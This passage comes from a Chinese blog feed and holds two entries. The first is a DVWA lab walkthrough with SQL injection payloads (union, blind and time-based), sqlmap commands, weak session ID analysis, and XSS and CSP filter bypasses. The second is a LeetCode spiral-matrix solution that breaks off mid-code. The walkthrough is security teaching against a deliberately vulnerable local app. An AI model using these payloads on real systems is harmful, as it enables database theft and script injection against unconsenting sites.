src="https://s2.loli.net/2022/01/24/cDxUblytOJ1wBgZ.png" alt="image-20220124213648935"></p><p>判断字段长度</p><p>1’ order by 1 #</p><p>输入3,出现报错。</p><p>说明只有两个字段。</p><p>判断回显:1’ union select 1,2 #</p><p>然后代入查询</p><p><img src="https://s2.loli.net/2022/01/24/RqZrntC85kxKHST.png" alt="image-20220124220733662"></p><p>获取表:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1' union select 1,table_name from information_schema.tables where table_schema='dvwa</span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/01/24/34ugY8AqWQDfabZ.png" alt="image-20220124221050252"></p><p>如果表比较多:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa</span><br></pre></td></tr></table></figure><p>然后查询字段:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users</span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/01/24/RxHAEnGBSiTW3ak.png" alt="image-20220124221524714"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1' union select group_concat(user_id,first_name,last_name),group_concat(user,password) from users #</span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/01/24/Gw1tvacdhSgZU8z.png" alt="image-20220124221846909"></p><p>MD5解密即可:</p><p><img src="https://s2.loli.net/2022/01/24/8XH3QWv9IpcJq5A.png" alt="image-20220124221948385"></p><p><img src="https://s2.loli.net/2022/01/26/HogpKf8xjsiatkd.png" alt="image-20220126190404257"></p><p>也可以通过sqlmap进行注入。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; security_level=0; PHPSESSID=2skes96bbgh4hn8js60vknurp1" -D dvwa -T users --columns</span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/01/26/sGvC79Rh6MT1rqe.png" alt="image-20220126191946435"></p><p><strong>2.medium</strong></p><p><img src="https://s2.loli.net/2022/01/24/aEw91XOGAWKBukU.png" alt="image-20220124231311544"></p><p>不能自己输入数据</p><p><img src="https://s2.loli.net/2022/01/24/uOy49EhINML6Bne.png" alt="image-20220124224410909"></p><p>直接用burpsuite抓包</p><p><img src="https://s2.loli.net/2022/01/24/o2UJIdgZqbtwNzs.png" alt="image-20220124224442044"></p><p>id=1 or 1=1#&Submit=Submit</p><p><img src="https://s2.loli.net/2022/01/24/UFYZXroLMngClAR.png" alt="image-20220124224747335"></p><p><img src="https://s2.loli.net/2022/01/24/JkoamMLNxgdEGKO.png" alt="image-20220124224948257"></p><p>然后按照Low级别进行注入即可。</p><p><img src="https://s2.loli.net/2022/01/24/pklj56ZqeiGwW7O.png" alt="image-20220124230216520"></p><p>这里对单引号进行了转义,可以用16进制或者Mysql函数进行绕过。</p><p><img src="https://s2.loli.net/2022/01/24/vCZJIKSzGfRhsVY.png" alt="image-20220124230508389"></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">s=<span class="string">'users'</span>.encode(<span class="string">'utf-8'</span>)</span><br><span class="line"><span class="built_in">print</span>(s.<span class="built_in">hex</span>())</span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/01/24/a3i6OJvGoNzwWfS.png" alt="image-20220124231444083"></p><p>也可以通过hackbar提交POST</p><p>先通过BP抓包,保存为文件 ,然后用sqlmap进行注入。</p><p><strong>3.high</strong></p><p>在新的一个页面进行查询,防止常规sqlmap注入。</p><p><img src="https://s2.loli.net/2022/01/24/fgWtSdFAP2lCpJy.png" alt="image-20220124233237791"></p><p>在sqlmap中,可以用second-url指定参数,然后进行注入。</p><h3 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>盲注</h3><p><strong>1.low</strong></p><p><img src="https://s2.loli.net/2022/01/26/gUuRlS6tnTAp4XQ.png" alt="image-20220126214941988"></p><p><img src="https://s2.loli.net/2022/01/26/RE98YaAZDiH3FJX.png" alt="image-20220126221926938"></p><p>存在字符型注入。</p><p>然后判断数据库名称长度:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1' and length(database())=1#</span><br><span class="line">1' and length(database())=2#</span><br><span class="line">1' and length(database())=3#</span><br><span class="line">1' and length(database())=4# 存在</span><br></pre></td></tr></table></figure><p>然后逐字符进行判断:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1' and ascii(substr(database(),1,1))<122# 可使用二分法</span><br></pre></td></tr></table></figure><p>也可以使用时间注入的方法:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1'and sleep(3)# 有延迟</span><br><span class="line">1 and sleep(3)# 无延迟</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1' and if(ascii(substr(database(),1,1))<120,sleep(5),1)#</span><br></pre></td></tr></table></figure><p><strong>2.medium</strong></p><p>跟前一模块一样,先burpsuite抓包,再进行注入。</p><p><strong>3.high</strong></p><p>跟前一模块相同。</p><h3 id="weak-Session-IDs"><a href="#weak-Session-IDs" class="headerlink" title="weak Session IDs"></a>weak Session IDs</h3><p><strong>1.low</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$html</span> = <span class="string">""</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$_SERVER</span>[<span class="string">'REQUEST_METHOD'</span>] == <span class="string">"POST"</span>) {</span><br><span class="line"> <span class="keyword">if</span> (!<span class="keyword">isset</span> (<span class="variable">$_SESSION</span>[<span class="string">'last_session_id'</span>])) {</span><br><span class="line"> <span class="variable">$_SESSION</span>[<span class="string">'last_session_id'</span>] = <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="variable">$_SESSION</span>[<span class="string">'last_session_id'</span>]++;</span><br><span class="line"> <span class="variable">$cookie_value</span> = <span class="variable">$_SESSION</span>[<span class="string">'last_session_id'</span>];</span><br><span class="line"> <span class="title function_ invoke__">setcookie</span>(<span class="string">"dvwaSession"</span>, <span class="variable">$cookie_value</span>);</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span> </span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/01/27/FeaI6jQ8923fin7.png" alt="image-20220127212611823"></p><p>每按一次,session_id+1,因此可以猜解。</p><p><strong>2.medium</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$html</span> = <span class="string">""</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$_SERVER</span>[<span class="string">'REQUEST_METHOD'</span>] == <span class="string">"POST"</span>) {</span><br><span class="line"> <span class="variable">$cookie_value</span> = <span class="title function_ invoke__">time</span>();</span><br><span class="line"> <span class="title function_ invoke__">setcookie</span>(<span class="string">"dvwaSession"</span>, <span class="variable">$cookie_value</span>);</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>cookie的值是系统当前时间。</p><p><img src="https://s2.loli.net/2022/01/27/zPIAk2Gsb3KRcYg.png" alt="image-20220127213037481"></p><p><strong>3.high</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$html</span> = <span class="string">""</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$_SERVER</span>[<span class="string">'REQUEST_METHOD'</span>] == <span class="string">"POST"</span>) {</span><br><span class="line"> <span class="keyword">if</span> (!<span class="keyword">isset</span> (<span class="variable">$_SESSION</span>[<span class="string">'last_session_id_high'</span>])) {</span><br><span class="line"> <span class="variable">$_SESSION</span>[<span class="string">'last_session_id_high'</span>] = <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="variable">$_SESSION</span>[<span class="string">'last_session_id_high'</span>]++;</span><br><span class="line"> <span class="variable">$cookie_value</span> = <span class="title function_ invoke__">md5</span>(<span class="variable">$_SESSION</span>[<span class="string">'last_session_id_high'</span>]);</span><br><span class="line"> <span class="title function_ invoke__">setcookie</span>(<span class="string">"dvwaSession"</span>, <span class="variable">$cookie_value</span>, <span class="title function_ invoke__">time</span>()+<span class="number">3600</span>, <span class="string">"/vulnerabilities/weak_id/"</span>, <span class="variable">$_SERVER</span>[<span class="string">'HTTP_HOST'</span>], <span class="literal">false</span>, <span class="literal">false</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span> </span><br></pre></td></tr></table></figure><h3 id="XSS"><a href="#XSS" class="headerlink" title="XSS"></a>XSS</h3><p><strong>1.low</strong></p><p>无任何过滤,直接XSS,<code><script>alert(1)</script></code></p><p><strong>2.medium</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">header</span> (<span class="string">"X-XSS-Protection: 0"</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// Is there any input?</span></span><br><span class="line"><span class="keyword">if</span>( <span class="title function_ invoke__">array_key_exists</span>( <span class="string">"name"</span>, <span class="variable">$_GET</span> ) && <span class="variable">$_GET</span>[ <span class="string">'name'</span> ] != <span class="literal">NULL</span> ) {</span><br><span class="line"> <span class="comment">// Get input</span></span><br><span class="line"> <span class="variable">$name</span> = <span class="title function_ invoke__">str_replace</span>( <span class="string">'<script>'</span>, <span class="string">''</span>, <span class="variable">$_GET</span>[ <span class="string">'name'</span> ] );</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Feedback for end user</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<pre>Hello ${name}</pre>"</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>双写绕过:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><scrip<script>t>alert(/xss/)</script></span><br></pre></td></tr></table></figure><p>大小写绕过:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><Script>alert(/xss/)</script></span><br></pre></td></tr></table></figure><p><strong>3.high</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">header</span> (<span class="string">"X-XSS-Protection: 0"</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// Is there any input?</span></span><br><span class="line"><span class="keyword">if</span>( <span class="title function_ invoke__">array_key_exists</span>( <span class="string">"name"</span>, <span class="variable">$_GET</span> ) && <span class="variable">$_GET</span>[ <span class="string">'name'</span> ] != <span class="literal">NULL</span> ) {</span><br><span class="line"> <span class="comment">// Get input</span></span><br><span class="line"> <span class="variable">$name</span> = <span class="title function_ invoke__">preg_replace</span>( <span class="string">'/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i'</span>, <span class="string">''</span>, <span class="variable">$_GET</span>[ <span class="string">'name'</span> ] );</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Feedback for end user</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<pre>Hello ${name}</pre>"</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>过滤了’script’,可以用其他标签绕过</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><img src="" onerror=alert(1)></span><br></pre></td></tr></table></figure><h3 id="CSP绕过"><a href="#CSP绕过" class="headerlink" title="CSP绕过"></a>CSP绕过</h3><p><strong>1.low</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$headerCSP</span> = <span class="string">"Content-Security-Policy: script-src 'self' https://pastebin.com hastebin.com example.com code.jquery.com https://ssl.google-analytics.com ;"</span>; <span class="comment">// allows js from self, pastebin.com, hastebin.com, jquery and google analytics.</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="variable">$headerCSP</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment"># These might work if you can't create your own for some reason</span></span><br><span class="line"><span class="comment"># https://pastebin.com/raw/R570EE00</span></span><br><span class="line"><span class="comment"># https://hastebin.com/raw/ohulaquzex</span></span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span> (<span class="variable">$_POST</span>[<span class="string">'include'</span>])) {</span><br><span class="line"><span class="variable">$page</span>[ <span class="string">'body'</span> ] .= <span class="string">"</span></span><br><span class="line"><span class="string"> <script src='"</span> . <span class="variable">$_POST</span>[<span class="string">'include'</span>] . <span class="string">"'></script></span></span><br><span class="line"><span class="string">"</span>;</span><br><span class="line">}</span><br><span class="line"><span class="variable">$page</span>[ <span class="string">'body'</span> ] .= <span class="string">'</span></span><br><span class="line"><span class="string"><form name="csp" method="POST"></span></span><br><span class="line"><span class="string"> <p>You can include scripts from external sources, examine the Content Security Policy and enter a URL to include here:</p></span></span><br><span class="line"><span class="string"> <input size="50" type="text" name="include" value="" id="include" /></span></span><br><span class="line"><span class="string"> <input type="submit" value="Include" /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string">'</span>;</span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/02/04/WtwgvO2QVAkaEun.png" alt="image-20220204095601218"></p><p>打开给定的网站</p><p><img src="https://s2.loli.net/2022/02/04/wXNlErgkYCeQOTv.png" alt="image-20220204095512846">写入一段Js代码</p><p><img src="https://s2.loli.net/2022/02/04/1HgryIJEGCTbx2R.png" alt="image-20220204095953637"></p><p><img src="https://s2.loli.net/2022/02/04/U9MhAg6BweJjVNX.png" alt="image-20220204095936972"></p><p><strong>2.medium</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$headerCSP</span> = <span class="string">"Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=';"</span>;</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="variable">$headerCSP</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// Disable XSS protections so that inline alert boxes will work</span></span><br><span class="line"><span class="title function_ invoke__">header</span> (<span class="string">"X-XSS-Protection: 0"</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment"># <script nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=">alert(1)</script></span></span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span> (<span class="variable">$_POST</span>[<span class="string">'include'</span>])) {</span><br><span class="line"><span class="variable">$page</span>[ <span class="string">'body'</span> ] .= <span class="string">"</span></span><br><span class="line"><span class="string"> "</span> . <span class="variable">$_POST</span>[<span class="string">'include'</span>] . <span class="string">"</span></span><br><span class="line"><span class="string">"</span>;</span><br><span class="line">}</span><br><span class="line"><span class="variable">$page</span>[ <span class="string">'body'</span> ] .= <span class="string">'</span></span><br><span class="line"><span class="string"><form name="csp" method="POST"></span></span><br><span class="line"><span class="string"> <p>Whatever you enter here gets dropped directly into the page, see if you can get an alert box to pop up.</p></span></span><br><span class="line"><span class="string"> <input size="50" type="text" name="include" value="" id="include" /></span></span><br><span class="line"><span class="string"> <input type="submit" value="Include" /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string">'</span>;</span><br></pre></td></tr></table></figure><p>输入:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><script nonce=<span class="string">"TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA="</span>><span class="title function_">alert</span>(<span class="number">1</span>)</script></span><br></pre></td></tr></table></figure><p>payload: <code><script src="source/jsonp.php?callback=alert('1');"></script></code></p>]]></content>
<categories>
<category> 渗透 </category>
</categories>
</entry>
<entry>
<title>螺旋矩阵输出</title>
<link href="/2022/01/18/juzhen/"/>
<url>/2022/01/18/juzhen/</url>
<content type="html"><![CDATA[<p>题目链接:<a href="https://leetcode-cn.com/problems/spiral-matrix/">https://leetcode-cn.com/problems/spiral-matrix/</a></p><p>题目要求:</p><blockquote><p>给定一个m x n大小的矩阵(m行,n列),按螺旋的顺序返回矩阵中的所有元素。</p></blockquote><p>举例:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">输入:[[<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>],[<span class="number">4</span>,<span class="number">5</span>,<span class="number">6</span>],[<span class="number">7</span>,<span class="number">8</span>,<span class="number">9</span>]]</span><br><span class="line">返回:[<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">6</span>,<span class="number">9</span>,<span class="number">8</span>,<span class="number">7</span>,<span class="number">4</span>,<span class="number">5</span>]</span><br></pre></td></tr></table></figure><img src="https://s2.loli.net/2022/01/18/t1dTKBC3Ao4ZXLj.png" alt="image-20220118182124918" style="zoom:67%;" /><p>首先遍历最外圈,然后将矩阵缩小一圈,递归进行。</p><p>要注意边界条件,即矩阵为空,或1行或只有1列的情况。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">递归方法</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Solution</span>:</span><br><span class="line"> <span class="keyword">def</span> <span class="title function_">spiralOrder</span>(<span class="params">self, matrix: <span class="type">List</span>[<span class="type">List</span>[<span class="built_in">int</span>]]</span>) -> <span class="type">List</span>[<span class="built_in">int</span>]:</span><br><span class="line"> m=<span class="built_in">len</span>(matrix)</span><br><span class="line"> <span class="keyword">if</span> m==<span class="number">0</span> <span class="keyword">or</span> <span class="built_in">len</span>(matrix[<span class="number">0</span>])==<span class="number">0</span>:</span><br><span class="line"> <span class="keyword">return</span> []</span><br><span class="line"> n=<span class="built_in">len</span>(matrix[<span class="number">0</span>])</span><br><span class="line"> </span><br><span class="line"> newlist=matrix[<span class="number">0</span>]</span><br><span class="line"> <span class="keyword">if</span> m><span class="number">1</span>:</span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,m):</span><br><span class="line"> newlist.append(matrix[i][n-<span class="number">1</span>])</span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(n-<span class="number">2</span>,-<span class="number">1</span>,-<span class="number">1</span>):</span><br><span class="line"> newlist.append(matrix[m-<span class="number">1</span>][j])</span><br><span class="line"> <span class="keyword">if</span> n><span class="number">1</span>:</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(n-<span class="number">2</span>,<span class="number">0</span>,-<span class="number">1</span>):</span><br><span class="line"> newlist.append(matrix[i][<span class="number">0</span>])</span><br><span class="line"> </span><br><span class="line"> M=[]</span><br><span class="line"> <span class="keyword">for</span> k <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,m-<span class="number">1</span>):</span><br><span class="line"> t=matrix[k][<span class="number">1</span>:-<span class="number">1</span>]</span><br><span class="line"> M.append(t)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> newlist+self.spiralOrder(M)</span><br></pre></td></tr></table></figure><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">思路清晰方法:</span><br><span class="line"> <span class="keyword">class</span> <span class="title class_">Solution</span>:</span><br><span class="line"> <span class="keyword">def</span> <span class="title function_">spiralOrder</span>(<span class="params">self, matrix: <span class="type">List</span>[<span class="type">List</span>[<span class="built_in">int</span>]]</span>) -> <span class="type">List</span>[<span class="built_in">int</span>]:</span><br><span class="line"> res=[]</span><br><span class="line"> <span class="keyword">if</span> <span class="built_in">len</span>(matrix)==<span class="number">0</span>:</span><br><span class="line"> <span class="keyword">return</span> []</span><br><span class="line"> <span class="comment">#定义四个边界点</span></span><br><span class="line"> left=<span class="number">0</span></span><br><span class="line"> right=<span class="built_in">len</span>(matrix[<span class="number">0</span>])-<span class="number">1</span></span><br><span class="line"> top=<span class="number">0</span></span><br><span class="line"> bottom=<span class="built_in">len</span>(matrix)-<span class="number">1</span></span><br><span class="line"> <span class="comment">#在不超过边界的条件下,进行一轮循环</span></span><br><span class="line"> <span class="keyword">while</span> (top<bottom <span class="keyword">and</span> left<right):</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(left,right):</span><br><span class="line"> res.append(matrix[top][i])</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(top,bottom):</span><br><span class="line"> res.append(matrix[i][right])</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(right,left,-<span class="number">1</span>):</span><br><span class="line"> res.append(matrix[bottom][i])</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(bottom,top,-<span class="number">1</span>):</span><br><span class="line"> res.append(matrix[i][left])</span><br><span class="line"> left+=<span class="number">1</span></span><br><span class="line"> top+=<span class="number">1</span></span><br><span class="line"> right-=<span class="number">1</span></span><br><span class="line"> bottom-=<span class="number">1</span></span><br><span class="line"> </span><br><span class="line"> <span class="comment">#如果剩余1行或1列:left=0 right1</span></span><br><span class="line"> <span class="keyword">if</span> top==bottom:</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(left,right+<span class="number">1</span>):</span><br><span class="line"> res.append(matrix[top][i])</span><br><span class="line"> <span class="keyword">elif</span> left==right:</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(top,bottom+<span class="number">1</span>):</span><br><span class="line"> res.append(matrix[i][left])</span><br><span class="line"> <span class="keyword">return</span> res</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>撞墙法,即改变方向法:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Solution</span>:</span><br><span class="line"> <span class="keyword">def</span> <span class="title function_">spiralOrder</span>(<span class="params">self, matrix: <span class="type">List</span>[<span class="type">List</span>[<span class="built_in">int</span>]]</span>) -> <span class="type">List</span>[<span class="built_in">int</span>]:</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> matrix:<span class="keyword">return</span> []</span><br><span class="line"></span><br><span class="line"> x=y=<span class="number">0</span> <span class="comment"># 矩阵元素位置初始化</span></span><br><span class="line"> res = [] <span class="comment"># 初始化,存储遍历后的矩阵元素</span></span><br><span class="line"> dx = [ <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>,-<span class="number">1</span>] <span class="comment"># 方向:右,下,左,上</span></span><br><span class="line"> dy = [ <span class="number">1</span>, <span class="number">0</span>,-<span class="number">1</span>, <span class="number">0</span>] <span class="comment"># 注:与通常平面坐标系 记号 不同</span></span><br><span class="line"> di = <span class="number">0</span> <span class="comment"># 初始化方向变量</span></span><br><span class="line"> visited = <span class="built_in">set</span>() <span class="comment"># 初始化集合,存储已走过的坐标</span></span><br><span class="line"> m,n = <span class="built_in">len</span>(matrix),<span class="built_in">len</span>(matrix[<span class="number">0</span>]) <span class="comment"># 矩阵的行列 </span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(m*n): <span class="comment"># </span></span><br><span class="line"> res.append(matrix[x][y]) <span class="comment"># 存储遍历矩阵过的元素</span></span><br><span class="line"> visited.add((x,y)) <span class="comment"># 存储遍历过的坐标</span></span><br><span class="line"> tx,ty = x+dx[di],y+dy[di] <span class="comment"># 先记录下一步坐标,用于判断下一步怎么走</span></span><br><span class="line"> <span class="keyword">if</span> <span class="number">0</span><=tx<m <span class="keyword">and</span> <span class="number">0</span><=ty<n <span class="keyword">and</span> 